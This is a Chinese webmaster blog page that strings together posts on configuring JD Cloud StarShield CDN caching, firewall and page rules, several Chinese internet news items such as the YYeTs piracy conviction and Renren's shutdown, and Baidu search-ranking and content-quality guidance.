资源通过缓存提供,但已经过期,安全加速无法获取源站检索更新后的资源BYPASS 源站通过设置为no-cache、private或max-age=0的Cache-Control标头指示源站绕过缓存REWALIDATED 资源通过缓存提供,但已过时。已通过 If-Modified-Since 标头或 If-None-Match 标头重新验证资源UPDATING 资源通过缓存提供,但已过期。资源目前正在由源Web服务器进行更新。 缓存配置 清除缓存清除缓存可能会暂时降低源站性能。安全加速支持全部缓存清除。 也支持自定义清除。自定义清除支持以下几种方式:URL,安全加速缓存中与URL完全匹配的任何资源都将从缓存中清除主机名,URL中其主机与提供值相匹配的任何资源都将从缓存中清除标记,由与提供值相匹配的Tag响应标头提供服务的任何资产都将从缓存中清除前缀,此目录中所有资源都将从缓存中清除缓存级别 通过缓存级别可以为静态内容设置缓存:标准,每次查询字符串更改时,都会提供不同资源如:example.com/pic.jpg?with=query基础,只有无查询字符串时,才从缓存中提供资源如:example.com/pic.jpg简单,即使是不同的查询字符串,依旧提供相同资源,即忽略如:example.com/pic.jpg?ignore=this-query-string缓存TTL可修改缓存文件时长,如4小时、1小时、30分钟等 #### 京东云星盾设置不拦截搜索引擎蜘蛛方法 虽然京东云星盾默认不拦截搜索引擎蜘蛛,但是以防万一,我们还是在防火墙规则加下白,省得误杀。 方法很简单,进入京东云星盾,安全规则-防火墙规则,创建一条规则。 规则描述:搜索引擎蜘蛛放行 字段:选Uesr-Agent 运算符:等于 值:填写搜索引擎的UA,比如百度 PCMozilla/5.0(compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html) 或者:同样的字段填其它搜索引擎的UA ,直到把所有搜索引擎的UA加完。 操作:允许 如下图: 然后确认就可以了,这样的话,防火墙就不会拦截添加的搜索引擎蜘蛛了。 如不知道具体搜索引擎UA的,可以看下面: 1、百度PC端: Mozilla/5.0(compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html) 2、百度移动端: Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html) 3、360 搜索 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider 4、必应搜索  Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) 5、头条PC搜索 so.toutiao.com Mozilla/5.0 (compatible; Bytespider; https://zhanzhang.toutiao.com/) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36 6、头条Android搜索 Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/) 7、头条iOS搜索 Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Version/7.0 Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/) 8、神马搜索 m.sm.cn Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36 Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.75 Mobile/14E5239e YisouSpider/5.0 Safari/602.1 9、谷歌搜索  Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 10、Yandex 俄罗斯的搜索引擎 Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) 11、搜狗搜索引擎 Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07) #### 京东云星盾设置全站缓存图文教程 设置全站缓存可以减少服务器回源次数,大大减轻服务器CPU带宽压力,适用于纯静态不需要登陆的网站。 今天小编来教大家设置全站缓存: 1.登陆京东云星盾管理页面-页面规则 2.点创建页面规则 3.设置缓存规则 URL:域名/* 比如主机邦zhujib.com/* *是通配符,表示这个域名下的所有URL地址 规则:缓存级别:缓存所有内容(一定要选这个,否则将无法全站缓存) 边缘缓存TTL:1小时 (这个是节点的缓存时间 设置越长,节点每次请求回源的间隔越长) 4.保存并部署 值得注意的,设置全站缓存是会影响网站后台登陆的,我们需要后台目录不缓存,根据上面的规则设置目录不缓存就可以了。 好了,以上就是京东云星盾的全站缓存教程了,希望可以帮到大家。 #### 京东云星盾防火墙介绍 安全加速的应用防火墙功能可检查 Web 流量以识别可疑活动。它能够根据您指定的规则集自动过滤非法流量。查看基于 GET 和 POST 的 HTTP 请求并应用规则集(如涵盖 OWASP Top 10 的漏洞的核心规则集),确定阻止、挑战或予以通过的流量。也可以阻止垃圾评论、跨站点脚本攻击和 SQL 注入。 WAF的作用是检查对您网站的HTTP请求,通过检查GET和POST请求,应用规则来帮助过滤掉访问中的非法流量。如果安全加速确定了可疑用户行为,则WAF将通过页面“挑战”此访问者, 此页面需要访问者成功提交验证码才可以继续进行操作。如果挑战失败,则该操作将会被拦截。这意味着 WAF将阻止被识别的任何非法流量到达源站服务器。 可以通过设置规则集的敏感程度,确定强制执行安全策略的严格程度。 确定适合站点的设置取决于多种因素。比如,如果您的企业业务包括大型文件上传到源服务器,则将敏感度以及安全级别降低更为合适。 从安全防御角度,上传大文件是一种常见的攻击方式,将会触发防火墙规则。 如果您需要站点的某些URL绕过防火墙规则,我们建议您设置页面规则,用来排除避免受到WAF的影响。 OWASP Top 10 核心规则 通过配置安全加速的OWASP Top 10核心规则,增强站点安全性,核心规则集主要覆盖OWASP Top10的攻击行为。 OWASP 核心规则集根据触发的OWASP规则为每个请求分配分数。某些OWASP规则的敏感度得分高于其他规则。OWASP评估请求后,安全加速会将最终分数与为该域配置的敏感度进行比较。如果分数超过了敏感度,请求将会被进行相应的动作处理。目前提供三种处理动作包括: 阻止-请求被丢弃挑战-访问者会收到验证码挑战页面日志记录-请求被允许通过,但记录在日志中 通过敏感度设置防御级别:高、中、低、关闭。 安全加速 托管规则 安全加速托管规则集,提供了对核心WAF安全的常见攻击规则。 防火墙规则 安全加速允许客户自定义防火墙规则,防火墙规则具备两个核心功能, 匹配:定义在节点运行下发的防火墙规则,过滤流量。 动作:定义匹配规则时安全加速应该执行的动作。 可作为过滤条件定义规则的字段有:ASN、Cookie、主机名、IP地址、refer、URI等等 可进行处理的动作包括: 允许-允许该请求阻止-请求被丢弃挑战-访问者会收到验证码挑战页面日志记录-请求被允许通过,但记录在日志中JS挑战-发起JavaScript挑战 #### 京东云星盾页面规则功能介绍 当客户端请求与您配置定义的URL规则匹配时,页面规则就会被触发产生相应的操作。您可以通过以下内容了解创建和编辑页面规则,以及进行不同的设置。 对于不同版本套餐,配置页面规则的数量有所不同。页面规则为最高优先级。 页面规则基于以下格式匹配URL: <scheme>://<hostname><:port>/<path 举例如下: https://www.example.com:443/image.png 协议以及端口是可选的,则scheme匹配“http://”和“https://”,如果未指定端口,则该规则将匹配所有端口。 您可以随时禁用页面规则,禁用规则后操作不会被触发,但是仍然会显示在页面规则应用中,并且会计入套餐允许的规则数量。 创建页面规则步骤参考 1.登录京东云控制台,选择安全加速。 2.选择需要添加页面规则的域名。 3.单击页面规则,在页面规则下,找到需要编辑的规则进行配置。 4.根据需要启用或禁用规则,通过编辑修改URL以及需要更改的信息,通过删除按钮进行规则删除。 通配符匹配 您可以在URL中通过通配符星号(*)来匹配URL,例如: example.com/t*st 将会匹配: example.com/test example.com/toast example.com/trust ... 注意以下情况不进行匹配: example.com/foo/* example.com/foo 通配符匹配参考: 在转发URL设置中,可应用如下的配置,如: 转发http://*.example.com/* 到 http://example.com/images/$1/$2.jpg 规则将匹配: http://cloud.example.com/flare.jpg 到 http://example.com/images/cloud/flare.jpg #### 京东云星盾高防CDN如何自配置缓存文件 今天,有客户咨询主机吧京东云星盾缓存没有办法自己配置吗?例如缓存哪些后缀名这种? 答案是可以的。 1.我们进入京东云星盾控制台-页面规则功能 2.创建页页规则 比如我们要网站中所有的zip压缩包文件,那么设置如下 URL:你的具体域名/*.zip(* 是通配符) 规则:边缘缓存TTL 时间:一年 (具体时间根据自己需求) 保存并部署即可缓存ZIP的文件,别的文件后缀也是一样的,也可以缓存网页HTML等。 #### 京东印尼站宣布将于 2023 年 3 月 31 日停止服务 1月30日消息:京东印尼站(https://www.jd.id)在官网宣布,将于2023年3月31日停止服务。 京东印尼站在官网表示,JD.ID及其所有服务将于2023年3月31日终止。对于在停止日期之前完成的交易,公司将照常履行订单,并且仍然提供售后服务和支持。如果有任何其他问题。请与客户服务部联系。 据了解,JD.ID是2015年11月由京东与新加坡投资公司Provident Capital在印尼成立的合资企业,同年也成立了JDL Express Indonesia。目前,JDL Express Indonesia已经停止了新用户注册。在此次停用物流服务之前,JDL Express Indonesia拥有11个仓库、250多个投递点和3000多名内部快递员,服务于500多个城市。 #### 亮剑网、战神军事网惨遭关停 9月20日 消息:    今天,上海网信办宣布依法关停亮剑网、战神军事网两个网站。上海网信办表示,根据网民举报并经核查确认,亮剑网、战神军事网违规发布大量政治、军事、外交等新闻信息,严重扰乱互联网信息传播秩序,社会影响恶劣。根据有关法律法规,上海市网信办会同上海市通信管理局依法注销亮剑网、战神军事网网站备案,停止网站接入并将其域名列入黑名单,停止域名解析。以下为网信办公告全文:根据网民举报并经核查确认,亮剑网、战神军事网违规发布大量政治、军事、外交等新闻信息,严重扰乱互联网信息传播秩序,社会影响恶劣。根据《网络安全法》《互联网信息服务管理办法》《互联网新闻信息服务管理规定》等法律法规,上海市网信办会同上海市通信管理局依法注销亮剑网、战神军事网网站备案,停止网站接入并将其域名列入黑名单,停止域名解析。近期,上海市网信办正在大力开展专项整治行动,将进一步加强对政治类有害信息、违法违规涉军有害信息和违规采编新闻行为的打击力度。上海市网信办负责人强调,网络空间不是法外之地,网站运营者要依法依规从事互联网信息服务,上海市网信办将继续加大互联网传播秩序整治力度。欢迎广大网民据实举报,共同维护良好的网络舆论生态(上海市互联网违法和不良信息举报中心举报网站:http://www.shjbzx.cn/,举报电话:021-55056666)。百度百度上已经找不到亮剑网、战神军事网了,国内打击非法网站越来越严了,大家千万别触碰非法违规内容哈,以免被关停,基本上被关停的都是没救的。 #### 人人影视二十年数据及程序开源分享(附百度网盘下载) 12月5日 消息:前段时间刚出狱的人人影视字幕组创始人梁良(别名“梁永平”)通过“人人影视字幕分享”微博账号宣布,将人人影视二十年累积的字幕数据进行开源分享。梁良表示,人人影视自成立起便致力于将翻译的字幕与更多爱好者共享,二十年来已翻译数万集影视字幕。基于字幕组分享的精神,他决定将所有字幕文件及对应数据库一并分享,供有需要的人下载保存。 梁良还提到,此次分享的内容包括人人影视开发的字幕软件及其源代码,以及尚未完成开发的网站设计模板和HTML页面等。对于人人影视数据库的未来发展方向,梁良表示正在研究其转型为海外影视评分和查询网站的可能性,并已初步形成想法。他计划过几天分享具体的想法,邀请有兴趣的人关注和探讨。 此次人人影视字幕数据的开源分享,不仅是对人人影视字幕组二十年工作成果的一次总结,也为影视字幕爱好者和开发者提供了宝贵的资源。 百度网盘:https://pan.baidu.com/share/init?surl=TjAJl7pN2xLDyGtHiCmPyw 密码:rrys 感觉站长(https://www.tianchenw.com/seo/ )投稿! #### 人人影视字幕组获刑 人人影视APP彻底没了! 11月22日 消息:今日,针对“创始人被抓”一事,人人影视官方回应称,用户可以把app的尸体删了,人人影视不可能再恢复或重启,因为不可能解决的了版权问题。 人人影视表示,很遗憾连累了开发以及服务器维护人员,人人影视十几年,很多程序员参与过开发,网站、制作字幕的软件、以及后来的app,可没想到会最终连累他们一起犯罪。 根据法院通报,自2018年起,人人影视创始人梁永平指使王某航(另案处理)雇佣万某某等人作为技术、运营人员,开发“人人影视字幕组”网站及Android、IOS、Windows、MacOSX、TV等客户端,由谢某洪(另案处理)等人组织翻译人员,从境外网站下载未经授权的影视作品,翻译、制作、上传至相关服务器,通过所经营的“人人影视字幕组”网站及相关客户端向用户提供在线观看和下载服务,网站及相关客户端内共有未授权影视作品32,824部,会员数量共计约683万。非法经营额总计人民币1,200余万元。 2020年9月,上海警方历经三个月侦查,抓获以梁某为首的犯罪嫌疑人14名。 今日,上海市第三中级人民法院公开开庭审理了被告人梁永平涉嫌犯侵犯著作权罪一案,并当庭作出一审判决,以侵犯著作权罪判处被告人梁永平有期徒刑三年六个月,并处罚金人民币一百五十万元。 所以,各位站长没有版权的话影视方面的东西千万别碰,不只要赔钱,还要坐牢的。 #### 人人影视网创始人已出狱!并清空了所有网站数据! 月6日消息,“人人影视字幕分享”“人人聊影视”等账号于8月5日在各大社交媒体同步发布视频。 在视频中,自称人人影视创始人梁良(即梁永平)称,人人影视是他一手做起来、也是他一手毁掉的,经过三年半的教育和反思,已经深刻意识到自己的问题和错误,也为自己带来的不良影响向公众道歉。  人人影视事件应该是中国版权规范的一个案例,早些年国内针对影视版权并不是很严,因此诞生了很多盗版网站,人人影视就是其中之一,因提供在线观看和离线下载创始人被抓,也因为这件事,国内很多出名的盗版网站意识到问题的严重性,纷纷关闭出逃,目前国内已经基本很少见到盗版网站了。 经过这么多年的发展,影视的版权基本都在国内这家头部公司垄断。目前想看电影不是爱奇艺就是爱奇艺,不得不感慨当年百花齐放的日子。 #### 人人网被爆停服后 公告称将换赛道 12 月 2 日消息,今天早些时候,各大媒体相继续报道了人人网现已无法登录的消息。目前人人网在官网发布了一则“服务升级公告”,宣布正在进行一次“换车”升级:“就像您的燃油车开了多年,也想试试新能源车一样。” 亲爱的人人网用户们, 感谢您一直以来的陪伴与支持!我们想告诉您,人人网正在进行一次“换车”升级 —— 就像您的燃油车开了多年,也想试试新能源车一样。 在这期间,您在人人网上的所有数据都得到了严格的保护,确保您的个人信息和隐私安全不受任何威胁。您的数据安全,对我们来说至关重要。 请耐心等待我们的“新车”上路,届时您将享受到更加稳定、安全、丰富的社交体验,让我们共同期待人人网的全新启程!敬礼! 人人网团队 2024 年 12 月 2 日 目前人人网官网仅剩下上述图片,无法登录注册账号。 人人网原名校内网,于 2005 年创办,是中国历史最悠久的校园社交网络平台之一,于 2009 年更名人人网。2010 年代,人人网凭借“偷菜游戏”开心农场火遍大江南北。 不过随着移动互联网时代,以及现在的视频直播时代的到为,逛人人网的用户已经越来越少了,人人网此次停服并不敢意外,只是此次换“车”,是要换什么呢?换直播?能否复活拭目以待。 #### 人生经验谈:程序员转行卖肉夹馍 “行人车辆请注意,火车就要开过来了,请在拦门外等候,不要抢行,不要钻栏杆……” (五道口:从北京北站出发的京包铁路的第五个道口,故名“五道口”,位于北京市海淀区成府路。) 伴随着最后一班火车的通过,我站在五道口刚刚装修好的西少爷肉夹馍店外,看着夜色下来来往往的人群,我想起自己IT北漂这三年没日没夜的加班,想起每天和100万人挤13号线的毫无存在感,想起五道口成为宇宙中心那天我却为了省钱被迫搬到昌平租房的酸楚。我想,那些都是我逝去的青春…… 三年前,我和很多人一样,从西安交大毕业后顺利进入了让人羡慕的互联网巨头(还是不点公司名字了,我只能说公司大到人人皆知),正式开始我的北漂生活,成为一个拿着高薪的码农,在上地科技园这片充满希望的田野上,挥洒着我的青春热血。那时候父母总以我为骄傲,“北京”、“高薪”、“大公司”这些标签成为他们在家乡朋友圈的谈资,每次电话里都要叮嘱我好好为老板打工,为公司服务。 两年前,我俨然成了半个北京人,说话逐渐习惯带着儿化音儿,虽然工资涨幅不大,但是偶尔还能和女朋友出去吃火锅、看电影、喝咖啡,都市的精彩在我老家是很难拥有的,这也让我越来越觉得离不开帝都,开始有了扎根帝都的冲动。我开始憧憬在帝都的未来,想必在不久的将来,我就能升职加薪,当上总经理,出任CEO,迎娶白富美,走上人生巅峰…… 一年前,华清嘉园的学区房涨到了10万每平米,五道口从此成了宇宙中心,而我不屑一顾的认为,除非我脑残,否则傻逼才会去买这种房子,我还清楚的记得那天回家跟女朋友聊起这个话题时,我说:“五道口一平米的房价我俩能游遍全中国,两平米房价能玩转欧洲,用不了一个厕所的钱就能环游世界了”,说完后我俩放声大笑。 半年后,女朋友却跟我提出了分手,因为我在北京没有房,给不了她安全感。那天是平安夜,我一个人走在冷冷的街上,放声痛哭,那一夜,我被这荒诞的现实击垮了。 身处宇宙中心,我却发现自己其实是这座城市的边缘,每天都伴随着枯燥的Java、MySQL、C++、Python加班到深夜,面对现实沉重的压力,我开始怀疑自己的价值,我北漂到底是为了什么?我真的要当一辈子的码农吗?我写了上百万行的代码为什么一点成就感都没有? 偶然的机会,在朋友推荐下我看了《寿司之神》这部电影,年逾86岁的小野二郎终其一生都在握寿司,成为全球最年长的三星级大厨,“米其林指南”更是对其赞不绝口,享誉全球。一个小小的寿司,能值得一个男人用其一生去追求极致,我深深地被他背后的付出和决不妥协的信念所触动,这不就是我想要的生活状态嘛!亲手做出世界上最好吃的肉夹馍是我从小的梦想,作为一名陕西吃货,我想创造属于自己的餐饮品牌! 我终于决定辞去这份让人羡慕的工作,回到陕西老家开始拜师学手艺,从零开始学做最正宗的陕西肉夹馍!因为热爱,一个多月我就出师了,但问题也接踵而来——要想在北京开店卖肉夹馍,就必须要放弃传统炉火烤制的方法,因为很多地方是不让起明火的,而且炉火烤制容易烤焦,也不够健康环保,如果直接换成电烤箱,又容易失去馍的酥脆口感。 经过半年的研发,用掉5000斤面粉和2000斤肉料,我们终于研制出西少爷特有的配方和流程,利用电烤箱即可完全还原出肉夹馍的香酥口感!我享受着每一份肉夹馍带给我实实在在的成就感! 今天,我将要带着“西少爷肉夹馍”重返五道口,这一次,我要重新定义宇宙中心! 小店就在搜狐网易大厦对面的超市广场上 卜蜂莲花(原易初莲花)大门口的广场上 装修这半个多月,每天都在店里忙活到凌晨两三点才能回去休息,以前加班到10点我就抱怨连连了,如今给自己打工到深夜简直是家常便饭,天下真没有躺着就能把钱赚了的好事儿啊! 希望好事多磨,一切的努力都没有白费 期待4月8号开业那天 为这一天,我们已经等待了192天了 五道口,晚安! 本文作者:43名少东家 文章来源:西少爷肉夹馍的微信 #### 什么值得买回应服务器遭攻击网站及APP异常 9月12日 消息:昨日 16 时左右,有大量网友反映称,什么值得买App和网站出现了无法访问的情况。 对此,昨日晚间,什么值得买发布公告回应称,9月11日下午16:00起,因服务器遭受大面积攻击,什么值得买App和网站出现了服务异常,导致值友无法正常使用。经紧急排查、修复,什么值得买App和网站正在逐步恢复正常。目前并未发现数据丢失和泄漏。 什么值得买称,对于本次服务器遭受大面积攻击事件,什么值得买公司已经向公安机关报案,公司将积极配合公安机关对攻击源进行追踪。   亲爱的各位值友: 2019 年 9 月 11 日下午16: 00 起,因服务器遭受大面积攻击,什么值得买App和网站(www.smzdm.com)出现了服务异常,导致值友无法正常使用。 经过值得买团队的紧急排查、修复,什么值得买App和网站正在逐步恢复正常。目前并未发现数据丢失和泄漏,请各位放心。 对此给值友造成的不便,我们深表歉意。 对于本次服务器遭受大面积攻击事件,什么值得买公司已经向公安机关报案,公司将积极配合公安机关对攻击源进行追踪。 什么值得买团队已经第一时间联合内部和外部的技术专家成立专项工作组,一起排查问题,避免再次发生类似事件。我们绝不会妥协,也希望与各位值友一起共同抵制黑客行为。 最后再次感谢各位值友的理解和支持。什么值得买将全力为各位值友提供更加优质的优惠信息和内容! 北京值得买科技股份有限公司 2019 年 9 月 11 日   #### 什么值得买网站被百度降权 这年头SEO不好做啊,连知名购物推荐网站什么值得买都被百度降权了! 从爱站查询来看,什么值得买自8月以来,百度PC词排名大幅下降,这种情况实属罕见,因为一般这种大站权重相当高,即使触发了百度的搜索引擎规则也不会轻易被降权。 目前已经快一个月了,还没有恢复的迹象,看得出百度现在权限真的毫无道理的,说降权就降权,百度现在极有可能针对一些大站做一些清洗,重新分配流量,因为现在AI时代来临,百度搜索自身的流量已经严重不足了。 #### 什么内容才是百度眼中的优质内容?  一直以来,百度搜索从用户角度出发,不断分析和研究用户需求,努力提升搜索结果的优质体验,期望将最优质的搜索结果返回给搜索用户。 什么样的内容才算优质?什么样的内容才能更好的满足用户的需求?现在小编将《百度搜索优质内容指南》带给广大内容生产者参考,希望您的优质内容获得更多搜索用户的青睐。 面向对象 《百度搜索优质内容指南》适用于所有与百度搜索合作的内容生产者,包括但不限于智能小程序、百家号、H5站、PC站等。  搜索结果中的专业问答/OpenCard/笔记等产品形态也需遵守本标准。   * 说明:对用户没有检索价值的页面,如色情、违法、作弊页面,低质页面(页面死链、空白、内容空短)等内容属于百度搜索算法严厉打击的低质作弊问题,具体可参考《百度搜索算法大盘点专题解读》。 百度搜索衡量优质内容的维度 百度搜索对优质内容的衡量其实很简单,会通过内容的“出身”、“颜值”、“内涵”和“口碑”来进行判断。 1.“出身”——生产者的权威可信度: 生产者有专业的认证,发布的内容领域专注,被公众认可并有一定的影响力。 2.“颜值”——浏览体验的轻松愉悦度: 页面加载迅速,内容排版精美,图像画质高清。 3.“内涵”——内容的丰富度和专业度: 文章主题前后一致,逻辑清晰,可以给用户提供丰富全面的信息,在领域内有一定的专业性。 4. “口碑”——用户的喜爱度: 内容被大量的用户喜爱,用户有强烈的分享和互动意愿。 百度搜索优质内容标准 优质内容生产者的资质说明 1► “内容创作者” *说明:“内容创作者”是指以个人或组织账号来发布内容的生产者。 1、创作者的账号真实可信; 2、创作内容领域专注,内容的领域不能过于分散; 3、创作者在创作的领域上拥有相关认证,确保内容的可信度和专业度; 4、创作者具有一定的活跃度,可以保持一定的内容更新频率。 上图:百家号内容创作者的优质示例 2► “站点级内容生产者”的资质 1、内容生产者有注册备案信息; 2、内容生产者在领域内持续深耕优质的内容,被公众认可并具有一定的权威度; 3、内容生产者有一定的活跃度,可以保持一定的内容更新频率;   上图:站点级内容生产者的优质示例 页面质量标准 1► 提供内容的页面 *说明:此类页面是指以文字、图片、视频为主要内容,让用户进行浏览的页面。 文字内容的优质标准 1、表述清晰 (1)文章标题通顺,能准确且生动地概况文章内容; (2)文章内容完整,表达明确,前后逻辑保持一致。 2、内容丰富 (1)文章信息丰富:①文字优美,提升用户浏览的愉悦感 ②可以给用户一定的指导和参考 ③内容引人深思 ;   (2)内容具有一定的专业深度,讲解透彻,深度聚焦,可以给用户全面的分析和阐述。 3、排版精美    文章段落清晰,分页明确,序号正确连贯,为用户带来轻松愉悦的浏览体验。  上图:文字内容的优质示例 图片内容的优质标准 1、信息全面 当主体内容对图片的依赖较高时,需要保证每一个步骤都有相应的配图; 2、极佳视效 图片画质高清,配色美观,水印可清晰分辨,不影响用户整体浏览; 图片的类型、格式、大小应保持统一,不存在重复、无效的图片。 上图:图片内容的优质示例 视频内容的优质标准 1、可看性强 在播放时,字幕与视频内容及播放进度应该保持同步;外文视频必须配有字幕辅助用户观看。 2、愉悦浏览 (1)视频画质高清,内容完整连贯易于理解;播放流畅,在播放中没有噪音、卡顿、水印等质量问题; (2)在制作时有专业口播和包装剪辑,转场效果流畅,生动有趣,给予用户极大程度的视听享受体验。 3、拓展升华 (1)内容充实有深度,可以给用户一定程度上的认知思考,提升用户的愉悦感,或带给用户一定参考、指导意义; (2)视频有配文、注释、弹幕、评分、点赞、评论区等多个增益功能或信息,为用户提供参考。   2► 提供服务的页面 *说明:此类页面是指以提供查询、下载、购买等功能为主的服务页面。 作为提供服务的优质页面,首先应该保证页面中的功能真实可用,操作便捷,不能有虚假信息、诱导关注等影响搜索体验的情况。在此基础之上,要做到: 可读性强 (1)页面的主要信息详细完整,表达明确,主题突出; (2)页面中的配图、视频画质高清,浏览顺畅; (3)内容排版整齐,段落分明,阅读时通顺流畅,并配有解释说明。 信息丰富 (1)在满足用户主要需求的基础上,有其他与主题相关的增益内容;        如:天气查询页面中,额外增加穿衣搭配建议、出行建议; (2)页面有趋势图、动态效果等多元的方式来呈现内容,使用户可以直观地获取所需信息; (3)评论区内容丰富,有大量真实用户的反馈,言语中肯有参考价值。 3 ► 首页、列表页等其他类型的页面 *说明:列表页是承接导航页与详情页的中间页,主体内容由多条信息条目组成。 信息完整 (1)页面标题显眼,方便阅读; (2)首页首屏或底部有导航栏,确保用户明确当前页面以及如何进入目标页面。 内容丰富 (1)页面主体内容丰富,配有推荐、运营活动、标签等参考信息,排版合理,可以清晰地将内容呈现给用户; (2)页面配有视频等增值内容,画质高清,播流畅,没有噪音、黑边等影响用户浏览的情况。 愉悦浏览 (1)页面内容排版美观,格式统一; (2)配图画质高清,图片配色优美,切换流畅,内容契合页面主题,给用户极佳的浏览体验。 #### 什么因素正在影响百度搜索结果排名? 来源:美通说传播 作者:刘晓林 原文:详解七大因素,什么正在影响百度搜索结果排序? 前不久看到李国威老师的一篇文章“公关部的第一职能是什么?”,其中提到一线公关人最大的烦恼是老板,颇有感触。 有一种KPI叫老板可见度,比如老板的朋友圈,老板的百度首页,公关有时候会迫于满足“老板的期待”,刚发了一篇新闻稿,老板可能会马上来问,为什么搜公司的名字百度首页还看不到,为什么稿子发出了百度指数还没变化? 最近写了一篇关于百度指数的文章,详解七大问题,用“百度指数”衡量公关的效果靠谱吗? 也陆续收到一些朋友的反馈,大多数问题还是百度搜索,比如上面这个问题,怎么才能让老板在搜索的时候,公司发布的新闻出现在百度的首页? 前面先用一句话总结,搜索引擎对结果的呈现,是由一系列复杂的算法、排序规则决定,并不是简单由“新发布的内容”决定。 我们先了解下百度搜索首页的结果通常是由什么信息组成的: 1、 百度付费广告(竞价排名推广/展示广告) 2、 百度免费产品:百科、资讯流(原百度新闻)、熊掌号、百家号、知道、贴吧、百库、地图、图片、视频、音乐、电商聚合等 3、 机构/企业官网 4、 新闻网站发布的新闻资讯 5、 社交网站的UGC内容,包括微博、问答类网站(知乎)、论坛、博客、视频网站等 6、 招聘信息网站 7、 分类信息网站 8、 电商购物网站(包括OTA在线旅行预订) 9、 股市行情(上市公司) 10、 其它相关网页信息 PC和移动端搜索除了设备和展示形式上的不同之外,前几种类型的内容会依次占据PC+移动首页搜索结果,排序不会有太多本质差别。除了百度付费广告和其产品外,自然搜索结果的排序主要由以下方面因素影响: 1 用户相关度 搜索引擎首先需要确保呈现结果与用户的搜索需求紧密相关,这里的相关度包括关键词在网页中出现的位置、频次(密度)。比如,企业官网包含的品牌和产品关键词最多,对于搜索引擎来讲,就是相关度最高的自然搜索结果推荐。 对于构成绝大多数自然搜索结果的资讯内容来说,关键词在正副标题、首段、正文中出现的位置、频次(合理的),对搜索引擎的相关度评判会有直接影响。在百度早期,内容与用户相关度的影响在搜索排序中的比重会占到七成。 以沃尔玛这篇新闻稿为例,核心关键词“沃尔玛”和“陈文渊”在标题和首段中分别出现六次和三次,在搜索结果中,相关度更高的网页就会优先推荐给用户。 再如,中国平安、华为、智慧城市为核心关键词,在标题和首段中的位置和频次得到保障,作为具有时效性的新闻事件,在百度网页和新闻搜索结果中推荐会更相关。 2 内容时效性 作为互联网动态更新的时效性内容源,搜索引擎会给予新闻网站以较高的权重。如果内容中带有比较明确的时间点信息(如新闻发生的具体时间),更有机会被搜索引擎作为新鲜的时效性内容抓取,再综合其它(下方)各项指标判定索引和推荐。 如果内容紧贴热点,在百度新闻和网页时效性卡片中获得展示的机会越大。 百度在 2017 年 3 月宣布取消新闻源数据库时,其公告中强调的核心根源就是因为“时效性内容识别技术”的升级。 3 内容质量 所谓内容质量,也就是内容能为用户产生的价值,近一年来非常明显的一个趋势是,百度正在网页和新闻搜索结果中过滤掉没有时效性,或被算法判定为营销内容的结果,即便是内容发布门户网站上,也不会受到靠前的搜索结果推荐。 百度站方曾接受界面采访时提到,“我们有个部门在过去半年时间内一直在调教算法,针对所有百度抓取到的网页,教机器来判断时效性和内容质量,在前端展示上,一些软文会被过滤掉,其他的不会发生太大变化”。 4 用户参与度 所谓用户参与度,是指构成用户参与的行为有阅读、点击、转评赞等互动行为,这些指标也是构成百度资讯指数的基础。用户对网页内容的参与度越高,搜索引擎认为其重要程度和受欢迎程度越高,页面则更有机会展现给用户。 一般来讲,社交类UGC内容如知乎、豆瓣等,招聘信息、分类信息、电商信息、股市行情等,通常更新频度高,点击量大,搜索结果会靠前,但基本上是非品牌公关目的的功能性作用,如招聘、销售等目的。 新闻网站发布的资讯新闻,新闻价值决定用户参与度,看的人越多,搜索结果推荐越靠前,越靠前用户点击越多,累积循环,这也解释了为什么多年前的负面新闻一直沉淀在百度首页,这就是典型的马太效应。 5 相关网页数量 除了搜索直接访问外,用户可能从其它网页链接的点击访问到内容,通过其它网页产生的关联越多,则更有利于长期的搜索长尾。对于站点来讲,内外链的数量,尤其是外部网页指向页面的锚文本数量、质量等,仍是搜索引擎判定网页价值的指标之一。 6 网页质量 网页的质量包括内容质量、浏览体验、PC和移动端的访问速度,友好程度、能否满足用户的延展需求等。除了对站点的评价之外,百度逐渐强化内容质量的识别评判,综合为内容所在落地页的评价。 尤其在百度取消新闻源数据库后,即使是门户等之前权威的新闻源站点,相同频道的不同质量的内容,获得百度新闻及网页收录的情况也明显不同,被算法综合评判为低质营销目的的软文(非时效性新闻),会被从结果中直接过滤或减少呈现。 7 关键词竞争度 关键词竞争度,是最容易被忽略和不被了解的因素,但恰恰是影响搜索结果排序最重要的隐藏方面。所谓关键词竞争度,也指关键词热度,指该关键词在百度搜索的热度和收录的相关网页、新闻数量。 举个简单例子,某关键词被用户搜索的频次越高,热度就越高,相关网页,新闻收录的数量越大,竞争度越大,也同时意味着新发布的内容,影响百度搜索结果排序的难度就越大。 关键词搜索的网页收录结果越多,该关键词的热度越高,竞争度越大 以 近期火爆的“这就是街舞”节目为例,每天有 5 万多人使用百度搜索“这就是街舞”,相关的网页收录结果有 403 万个,百度新闻 12 万篇,这也就意味着新发布的关于“这就是街舞”的内容,要和现有的这 403 万个网页或 12 万篇新闻进行PK,经过算法的综合评判后,占据优势才有机会被这 5 万名用户在搜索时看到。 